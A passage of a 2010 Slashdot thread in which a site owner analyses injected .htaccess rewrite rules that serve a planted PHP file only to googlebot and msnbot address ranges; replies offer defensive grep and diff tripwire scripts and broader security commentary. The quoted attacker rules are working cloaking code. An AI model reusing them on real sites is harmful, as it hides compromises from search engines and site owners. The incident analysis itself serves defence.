    RewriteCond %{REMOTE_ADDR} ^65\.5[2-5]\.[0-9]+\.[0-9]+$ [OR]
    RewriteCond %{HTTP_USER_AGENT} (google|msnbot)
    RewriteRule ^(.*)$ pop/media/images/07_22/7_22-5.class.php [L]

    Those address ranges, btw, are all for googlebot and msnbot, so this only fires if you are coming from one of those net blocks. The special Google URL checker wasn't coming from one of those addresses, which is why it worked.

    The scary thing is that this code is correct except for one little detail. The bots were getting 404s because the Black Hats got the path wrong. This isn't a normal PHP site and the topmost directory contains all of the Django stuff in one branch and all of the media in a different branch. Apache sees that topmost directory and it's where the .htaccess file lives, but the master .conf file has a specific <Location> rule that maps directly to /media, not /pop/media. If they had not made that error I don't know how long it would have taken to uncover this.

    We still don't know how they got in. We changed all of the passwords and double-checked that we were up to date on all of the server code. There also are multiple levels of tripwires in place now so I'll know about any changes within minutes of it happening. And now we wait . . . .
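    For anyone who wants to sanity-check rules like these, the REMOTE_ADDR conditions can be replayed against sample client addresses with grep -E. A quick sketch using two of the regexes quoted above (the sample IPs are just illustrations, not logged attackers):

```shell
# Sketch: replay two of the injected REMOTE_ADDR regexes against sample
# client IPs. The first two samples fall inside the googlebot ranges and
# would have triggered the RewriteRule; the last is an ordinary address.
pattern='^66\.249\.[6-9][0-9]\.[0-9]+$|^74\.125\.[0-9]+\.[0-9]+$'
for ip in 66.249.65.10 74.125.1.2 192.168.0.5; do
  if printf '%s\n' "$ip" | grep -Eq "$pattern"; then
    echo "$ip: would be cloaked"
  else
    echo "$ip: served normally"
  fi
done
```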

    • by CoffeePlease ( 596791 ) on Thursday February 04, 2010 @12:01PM (#31023848) Homepage
      If you run insecure web apps, they can use http injection to write to your .htaccess file. See my post on how I fixed my own site after one of these attacks. http://thedesignspace.net/MT2archives/000505.html [thedesignspace.net]
    • Wow, very frightening. You've already been modded Informative, but more people need to read and understand this.
    • Re: (Score:3, Informative)

      by xandroid ( 680978 )

      If your site is on a shared server, it may be the case that another user of the server got hacked (or is malicious in the first place) and was able to access your files. In this case, it's a very good idea to notify your host that your files have been messed with.

      Something you may consider: make a backup of a known-good .htaccess, and set up a cronjob to `diff --brief` the two frequently and email you if they're not the same. I've done this with a list of all the PHP files in my account on a shared server:

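      That backup-and-diff idea can be sketched as a small script for cron. The paths and the helper name here are placeholders, not anyone's actual setup:

```shell
# Sketch of the cron tripwire described above: compare the live .htaccess
# against a known-good copy with diff --brief. All names are placeholders
# for your own layout.
check_htaccess() {
  live="$1" good="$2"
  if diff --brief "$live" "$good" >/dev/null 2>&1; then
    echo "ok"
  else
    echo "CHANGED: inspect $live now"
  fi
}
# From cron, you might mail yourself any non-ok result, e.g.:
#   check_htaccess /var/www/.htaccess /root/htaccess.good \
#     | grep -v '^ok$' | mail -s 'htaccess tripwire' you@example.com
```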

      • Good points.

        This is a dedicated server and has only three accounts with passwords, all of which are strong. Only 4 ports are open: 22 (SSH), 80 (HTTP), 443 (HTTPS), and 8000, which is where I do short runs of the Django development server. The dev server port only responds to a very short list of hardwired IPs. SSH disallows root logins. Apache is chrooted and uses suexec. This last wasn't true before and is quite probably the entry vector.

        I mentioned tripwires. Since everything is under Mercurial VCS

    • Hey, a fellow django'er :)

      A bit off-topic, but do you load PHP in the same apache as you run your django project?
      I've had some problems with that (shared libraries), plus I don't need php, so I usually turn it off.

      As a side effect, it would help against such an attack too.

        Sigh, yes, we do have mod_php and mod_python in the same server. I had a problem combining the two on another site (also a Django site, but with an osCommerce store (and, no, I didn't have anything to do with that piece of crap)), and it turned out to be a problem with shared MD5 libraries (if memory serves, this was almost 3 years ago). Here I'm running it just because I like phpMyAdmin.

        Now you've made me feel lazy and bad and I hope you're happy with yourself. Maybe I'll run an alternate Apache with

  • Kudos on the work you did to figure this one out! I appreciate the time you took to investigate this one.
  • by Sloppy ( 14984 ) on Thursday February 04, 2010 @01:23PM (#31024952) Homepage Journal

    But the larger point is that as malware becomes more aggressive, it's not just going to become harder to keep your PC and websites uninfected. It's also going to become harder for site owners and for hosting company abuse departments to verify that a site has been hacked.

    The very idea of "verifying that a site is not hacked" is ultimately just as flawed as running a virus scanner to verify that you don't have a virus installed. Once a system is compromised, you can't trust it to help you find the problem. Checking to see if it happens to be serving malware right now isn't reliable, since the malware gets to decide whether or not to act suspiciously, and making decisions based on referer and user-agent is really just the tip of the iceberg compared to what is possible. What if it randomly decides to serve malware on 0.01% of the requests? You'll never be able to diagnose it that way, and in the unlikely event that you do happen to see something suspicious, you're going to start questioning yourself when it turns out to not be repeatable.

    Don't install the malware in the first place. I won't say that defending in depth beyond that point is totally useless, but it's pretty close to useless. Once you're infected: game over, you lost.
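    A back-of-envelope check of the 0.01% point above (the figure is from the comment, not a measurement): the chance that an audit of n requests catches a page serving malware on a fraction p of hits is 1 - (1 - p)^n, which stays tiny for any realistic spot check.

```shell
# Rough sketch: with p = 0.0001 (0.01%) and a 100-request audit,
# 1 - (1 - p)^n works out to roughly a 1% chance of seeing the
# payload even once.
awk 'BEGIN { p = 0.0001; n = 100; printf "%.4f\n", 1 - (1 - p)^n }'
```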

  • by Anonymous Coward

    Firefox + Greasemonkey + "Google Image Search Direct Links"

    That puts an extra link on each picture on the Google Image results. A link that just gives you the JPG and nothing else.

  • by vuo ( 156163 ) on Thursday February 04, 2010 @04:41PM (#31027416) Homepage

    I never understood why Google wants to load the site in a frame, which is unimaginably distracting, and often the image is difficult to find. If they instead cached a screenshot and moved the cursor automatically to the image, it would be more convenient, more reliable, and safer.
